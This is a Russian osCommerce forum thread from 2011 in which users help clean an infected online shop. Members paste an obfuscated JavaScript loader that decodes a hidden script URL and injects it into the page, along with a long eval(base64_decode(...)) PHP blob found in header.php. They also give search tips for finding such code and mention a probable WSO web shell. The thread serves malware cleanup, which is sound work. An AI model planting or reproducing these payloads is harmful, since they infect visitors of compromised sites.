Русский OsCommerce

Здравствуйте, гость ( Вход | Регистрация )

 Правила форума Правила форума
 
Ответить в данную темуНачать новую тему
> Встроенная ссылка на сторонний скрипт
yrygvay
сообщение 2.4.2011, 12:51
Сообщение #1


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



Добрый День.

Сам я пользователь Joomla и соответственно строю свои магазины на ней.
Но вчера знакомы попросил посмотреть его сайт построенный на OSCommerce.
Зайдя по ftp примерно понял структура вашего магазина...

Но столкнулся вот с какой проблемой.

Не пойму куда запихнули строчку с вредоносным кодом, если при открытие сайта Касперский пишет 02.04.2011 13:29:50 Веб-Антивирус Запрещено: http://5634.in/1301740200.php (проверка по базе подозрительных веб-адресов) Firefox http://5634.in/1301740200.php Ссылка обнаружена в базе

Получается эта ссылка где- сидит в файлах, но вот где?

Попробовал поискать в Index.php но там вроде чисто... .может подскажите куда смотреть и как лучше поискать?*
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 4.4.2011, 13:55
Сообщение #2


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



Пробовал делать поиск по всем файлам на сайте. но он ни чего не дал..
Как же можно найти?

сайтhttp://logistic-m-shop.ru/
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 4.4.2011, 15:14
Сообщение #3


Модератор
Иконка группы

Группа: Members
Сообщений: 14847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



Наверняка в index.php сидит, либо в javascript файлах.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 4.4.2011, 15:41
Сообщение #4


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



а что именно там должно сидеть..просто беглым взглядом не увидел там ни чего странного.

Но со вчерашнего дня уже началось попытки скачивания вирусов, а не просто попытка перехода по ссылке ( информация от антивируса!)
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 4.4.2011, 17:05
Сообщение #5


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2277



Поищи такую строку: window.onload=function()
к ней обычно прилагается такой код:

CODE
<script language="JavaScript">if (typeof color_arr == 'undefined') {
var color_arr = true;
window.onload=function(){
var opendivclr = '';
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74',
'#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281',
'#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e',
'#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#79823e', '#314d4b',
'#3e8272', '#81787f', '#834d00');
for (j=0;j<div_colors.length;j++) {
var c_rgb = div_colors[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!='00') opendivclr += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if(!document.getElementById || !document.createElement){
document.write(opendivclr);
} else {
var new_cstyle=document.createElement('script');
new_cstyle.type='text/javascript';
new_cstyle.src=opendivclr.substr(36,36);
document.getElementsByTagName('head')[0].appendChild(new_cstyle);
}
}
}</script>



Напрямую ссылку ты не найдешь, она видимо декодируется из 16ричного кода


бэкап надеюсь есть?

прошерсти папку images, нет ли там лишних папок типа banners

ну и тема уже обсуждалась:

http://oscomm.biz/index.php?showtopic=18514
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 4.4.2011, 19:29
Сообщение #6


Модератор
Иконка группы

Группа: Members
Сообщений: 14847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



Ну например должно сидеть что-то вроде:
Код
<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f',

или:
Код
<?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
    $tc = array(0, 69, 84, 82,

или:
Код
if (typeof(def_colors)=="undefined") {
   var def_colors = 1;

   var div_colors = new Array('#778383', '#
Перейти в начало страницы
 
+Цитировать сообщение
Vera
сообщение 4.4.2011, 22:43
Сообщение #7


Новичек
Иконка группы

Группа: Members
Сообщений: 18
Регистрация: 25.3.2008
Из: Moscow
Пользователь №: 26339
Имя, Фамилия: Вера
Откуда:Москва



Честно говоря, вообще не знаю, что делать...
Не могу войти в администраторскую магазина, вижу в строке браузера ссылку не связанную с моими доменами...



сам магазин, вроде бы, выглядит нормально... но администрировать то его я не могу...
у меня на этом хосте еще 4 сайта, обычные, в HTML - с ними все в порядке!

Как мне быть? у меня бэкап всего аккаунта (единый сжатый файл на все сайты)
Мне сносить только магазин и вытаскивать файлы из бэкапа, или вообще все сайты и страницы заливать по новой?

Помогите пожалуйста советом, не знаю с какого бока подойти к проблеме, магазин покупала в VAM сборке, кажется в 2007 году, точно не помню.


Файлы php в папках image нашлись, я их удалила... Сейчас-то что мне делать... *просто в шоке



Если я сделаю сейчас бэкап MySQL все данные складов и заказов сохранятся? Можно будет после переустановки магазина им воспользоваться?
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 5.4.2011, 8:09
Сообщение #8


Модератор
Иконка группы

Группа: Members
Сообщений: 14847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



Вот в этой теме есть пара советов - http://oscomm.biz/index.php?showtopic=18502
Можно их выполнить + почистить вирус.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 5.4.2011, 10:53
Сообщение #9


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



Цитата(Drum @ 4.4.2011, 17:05) *
Поищи такую строку: window.onload=function()
к ней обычно прилагается такой код:

CODE
<script language="JavaScript">if (typeof color_arr == 'undefined') {
var color_arr = true;
window.onload=function(){
var opendivclr = '';
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74',
'#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281',
'#724c31', '#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e',
'#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#79823e', '#314d4b',
'#3e8272', '#81787f', '#834d00');
for (j=0;j<div_colors.length;j++) {
var c_rgb = div_colors[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!='00') opendivclr += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if(!document.getElementById || !document.createElement){
document.write(opendivclr);
} else {
var new_cstyle=document.createElement('script');
new_cstyle.type='text/javascript';
new_cstyle.src=opendivclr.substr(36,36);
document.getElementsByTagName('head')[0].appendChild(new_cstyle);
}
}
}</script>

Напрямую ссылку ты не найдешь, она видимо декодируется из 16ричного кода
бэкап надеюсь есть?

прошерсти папку images, нет ли там лишних папок типа banners

ну и тема уже обсуждалась:

http://oscomm.biz/index.php?showtopic=18514


В папке images есть папка banners/thumbnails/eshop_master.gif.thumb_273x35.gif
Перейти в начало страницы
 
+Цитировать сообщение
Drum
сообщение 5.4.2011, 19:37
Сообщение #10


Участник обсуждения
Иконка группы

Группа: Members
Сообщений: 82
Регистрация: 4.9.2004
Пользователь №: 2277



Думаю лучше снести все, потом восстановить из бэкапа, если просто восстановить - то лишние вредоносные файлы останутся.
Ну и конечно дыры закрыть.
Я у себя так делал.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 6.4.2011, 14:14
Сообщение #11


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



Везёт, но проект не мой.
Да и бекапов вроде у человека нет((

Просто не знаю чем поискать эти строки. пробовал тотал командером, но он не находит данный текст в файлах вроде.

Как ещё попробовать не приложу ума..
Перейти в начало страницы
 
+Цитировать сообщение
VaM
сообщение 6.4.2011, 14:17
Сообщение #12


Модератор
Иконка группы

Группа: Members
Сообщений: 14847
Регистрация: 12.5.2002
Из: Ставрополь
Пользователь №: 25
Имя, Фамилия: Александр Меновщиков



Нужно искать редактором нормальный, который умеет искать по папке, т.е. указываете что искать, указываете папку и запускаете поиск.

Adobe dreamweaver например.

Или я например использую blusfish, правда под линукс, но есть версия под в windows - http://bluefish.openoffice.nl/index.html

Очень быстрый редактор и ничего лишнего.
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 6.4.2011, 15:30
Сообщение #13


Profi
Иконка группы

Группа: Members
Сообщений: 9694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Цитата(yrygvay @ 6.4.2011, 16:14) *
пробовал тотал командером, но он не находит данный текст в файлах вроде.

Total commander отлично всё ищет. Если не находит - значит нет такой строки. Значит не то ищете.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 7.4.2011, 11:55
Сообщение #14


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



а что же тогда искать... у человека все клиенты перестали заходить на сайт!!


Может кто оказать помощь ?
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 7.4.2011, 15:50
Сообщение #15


Profi
Иконка группы

Группа: Members
Сообщений: 9694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Ну так можно смотреть файлы, начинать с index.php и т.д. Искать подозрительный код. Я за последние пару недель вытащил кучу сайтов. На одних код повторялся и примитивный сканер его обнаруживал по набору контекстных строк на ура, на других приходилось искать "руками". Это не сложно, но очень нудно sad.gif
Не надо искать по полному коду, нужно выбрать ключевые куски. Пусть даже этот поиск "зацепит" нормальный код. Например, в скрипте практически не используется eval(, редко используется base64_decode(, $_FILES и тому подобное.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 8.4.2011, 8:55
Сообщение #16


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



Цитата(a_berezin @ 7.4.2011, 15:50) *
Ну так можно смотреть файлы, начинать с index.php и т.д. Искать подозрительный код. Я за последние пару недель вытащил кучу сайтов. На одних код повторялся и примитивный сканер его обнаруживал по набору контекстных строк на ура, на других приходилось искать "руками". Это не сложно, но очень нудно sad.gif
Не надо искать по полному коду, нужно выбрать ключевые куски. Пусть даже этот поиск "зацепит" нормальный код. Например, в скрипте практически не используется eval(, редко используется base64_decode(, $_FILES и тому подобное.


eval( нашлось 65 файлов!

в файле header.php

Код
<?php eval(base64_decode("ZnVuY3Rpb24gZXZhbGhJT29MZ0xLWlltdEooJHMpe2ZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4o
JHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2
Y
WxoSU9vTGdMS1pZbXRKKCc7KSkiPTAzT3BBVFdMbEdUUnhtYzBsa1VxNTBUc0ZtZGxSQ0tsUjJialZHW
m
ZSak5sTlhZaUJpYnlWSGRsSjNlZ2tDTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSm9rMVNweFVVc0pIZE
p
KbGFPOUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29
M
Z0xLWlltdEooJzspKSI9c1RLaTBUUDNKV2IxY1ZZaWdTV0xsR1RSeG1jMGxrVXE1MFRzRm1kbEJTUGdF
M
VFTRjNZVGwzVklKbFJ5UlZUNXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoS
U
9vTGdMS1pZbXRKKCc7KSkiN2tpSTkwRVNraG1Vek1tSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWjlNa1
l
aSlZkaGhsZXhsRVMzVjBhd3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9
v
TGdMS1pZbXRKKCc7KSkiPXNUS2kwVFBCTkdNU2hVWWlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGwxamUy
b
FhlcVYwWmhSM1EycEhjRnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxoSU9vT
G
dMS1pZbXRKKCc7KSkiPXNUS2kwRE5YRm1Jb2sxU3B4VVVzSkhkSkpsYU85RWJoWlhaOXNXWVNCWFNpVk
V
WaHAxVWl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10Sig
n
OykpIj1zVEtpMFRQUmxrZGtkVlNpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsMVRUbnQwUnZoWFRIUlZT
W
VprVGF4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignO
y
kpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9rMVNweFVVc0pIZEpKbGFPOUViaF
p
YWmJKVlJXSlZSVDlGSjlVRmJKRm5heGQyUkpwMmR6eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJyk
p
O2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9PXdPcGtpSTkwelpqeEdldGxGZEcxV1ZpZ1NXTGxH
V
FJ4bWMwbGtVcTUwVHNGbWRsQkNMcElDTldka1cxWjBWWEpDS1p0VWFNRkZieVJYU1NwbVRQeFdZMlZHS
X
NraUk5a0VXYUpEYkhGbWFLaFZXbVowVmhKQ0tadFVhTUZGYnlSWFNTcG1UUHhXWTJWR0lza2lJd2tUYl
I
5a1RXUmxJb2sxU3B4VVVzSkhkSkpsYU85RWJoWlhaZ3dTS2kwVFF1TldNNEpUVmlnU1dMbEdUUnhtYzB
s
a1VxNTBUc0ZtZGxCQ0xwSUNiNEpqVzJsak1TSkNLWnRVYU1GRmJ5UlhTU3BtVFB4V1kyVkdLNUZtY3lG
R
0k5QVNZNmhIU3Y1V1FtbFVlUWRtZHp4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChld
m
FsaElPb0xnTEtaWW10SignOykpIj09d09STmtVeE4yVTVkRlNTWmtjVTFVZXNGbWRsUlNQdVExYk0xV1
N
ZTjNUWGhFWllaRmJoWlhaa0FTS2dzeUtwUkNJN1VESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWR
v
Y2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI3a1NLaTBUUFJaMk5y
b
DNZcmRXZWpCVE5YcEZNMUlqWXFsalJreEdaeWdGYjRkVll0SlVSSlZuU1lSR01XMTJZM0kwVUxwblVEd
G
tlajFtV25Sak1pQm5VemtWZFc1bVdpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsaENiaFpYWiIoZWRvY2
V
kXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGhJT29MZ0xLWlltdEooJzspKSI9PXdPUk5rVXhOMlU1ZEZ
T
U1prY1UxVWVzRm1kbFJpTGk0aUk5NENJVTlHVHRsRVd6OTBWSVJHV1d4V1kyVkdKIihlZG9jZWRfNDZl
c
2FiKGxhdmUnKSk7ZXZhbChldmFsaElPb0xnTEtaWW10SignOykpIjkxM094azFTcHhVVXNKSGRKSmxhT
z
lFYmhaWFprQXlib05XWjcwVk1iRlRXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsUkNJOUFTTVp0VWFNRkZieV
J
YU1NwbVRQeFdZMlZHSmdzVEt4azFTcHhVVXNKSGRKSmxhTzlFYmhaWFprd1NUbnQwUnZoWFRIUlZTWVp
r
VGF4V1kyVkdKb1VHWnZ4R2M0VkdJOUFTTVp0VWFNRkZieVJYU1NwbVRQeFdZMlZHSjdsU0tOZDJTSDlH
Z
U5kRVZKaGxST3BGYmhaWFprd1NNWnRVYU1GRmJ5UlhTU3BtVFB4V1kyVkdKb0lIZHpKSGR6aENJbWwyT
3
BrU1hwSVNWT0ZEVkpsalJWVmxVR05sSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWmJKVlJXSlZSVDlGSm
9
VR1p2Tm1ibHhtYzE1U0tpa3padHBrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVrU1ZzbFVjcUYzWkh
s
a2EzTkhiaFpYWmtnU1prOTJZdVZHYnlWbkxwSVNPSjFtU2lnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGw1
U
1hwSVNQSlprVUZaRU1ZWmtVeFFsVFd0V1ZpZ1NXTGxHVFJ4bWMwbGtVcTUwVHNGbWRsdGxVRlpsVUZOM
V
hrNFNLaTBETVVGbUlvazFTcHhVVXNKSGRKSmxhTzlFYmhaWFp1a2lJOWdEUmpKQ0tadFVhTUZGYnlSWF
N
TcG1UUHhXWTJWbUxwSXliQzVHVGlnU1dMbEdUUnhtYzBsa1VxNTBUc0ZtZGw1eWFoSkZjSkpXUlVGbVd
U
SkdiaFpYWms0U0tpMFRQM3hrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVRMWJNMVdTWU4zVFhoRVpZ
W
kZiaFpYWms0U0tpMERPNXhrSW9rMVNweFVVc0pIZEpKbGFPOUViaFpYWnVraUk5MHpaUEpDS1p0VWFNR
k
ZieVJYU1NwbVRQeFdZMlZtTDZaWGU1cFdSbkZHZERabmV3VkViaFpYWmtneU1uWkdJOUFTTVp0VWFNRk
Z
ieVJYU1NwbVRQeFdZMlZHSmdzVEt3QURPd0V6S3BnU1p0bEdkc2tTS2kwVFRJUkdhU056WWlnU1dMbEd
U
UnhtYzBsa1VxNTBUc0ZtZGxoU05rMUdMREpXV1NWWFlZcFhjSmgwZEZ0R2NzRm1kbFJDS2xsMmF2OTJZ
M
FYyY0FCeWVnVTJjc1ZHSTl0SElwa1NLZE5rWVpKVmRoaGxleGxFUzNWMGF3eFdZMlZHSmJWVVNMOTBUR
D
lGSm9RWFp6Tlhhb0FpY3ZCU0twVUZiSkZuYXhkMlJKcDJkenhXWTJWR0pnd2lJcDlpSWc0Q0lwRW1lNG
g
wYnVGa1pKbEhVblozY3NGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJ
I
S29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTs="));?>



Это она гадость?
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 8.4.2011, 10:54
Сообщение #17


Profi
Иконка группы

Группа: Members
Сообщений: 9694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Оно. Дихлофосом её! Удаляйте и ищите дальше. Они по одному обычно не ходят.
Перейти в начало страницы
 
+Цитировать сообщение
yrygvay
сообщение 8.4.2011, 13:00
Сообщение #18


Новичек
Иконка группы

Группа: Members
Сообщений: 8
Регистрация: 2.4.2011
Пользователь №: 48835
Откуда:Moscow



странно, но в других не вижу.

Интересно а как эту дырку то уже найденную закрыть в этом файле?
Перейти в начало страницы
 
+Цитировать сообщение
a_berezin
сообщение 8.4.2011, 13:08
Сообщение #19


Profi
Иконка группы

Группа: Members
Сообщений: 9694
Регистрация: 7.5.2004
Из: Санкт-Петербург
Пользователь №: 1538
Имя, Фамилия: Андрей Березин
Откуда:Россия, Санкт-Петербург



Вы с терминологией сначала разберитесь.

Из этого файла нужно удалить паразитный код.

Потом ещё нужно искать инструмент, с помощью которого в этот файл был вставлен этот код. Наверняка это Веб-шелл wso. Где-нибудь среди картинок притаился. Или среди js. Или в корневой.

А дырку нужно искать в указанных местах, прежде всего в application_top.
Перейти в начало страницы
 
+Цитировать сообщение

Ответить в данную темуНачать новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 10.7.2020, 20:06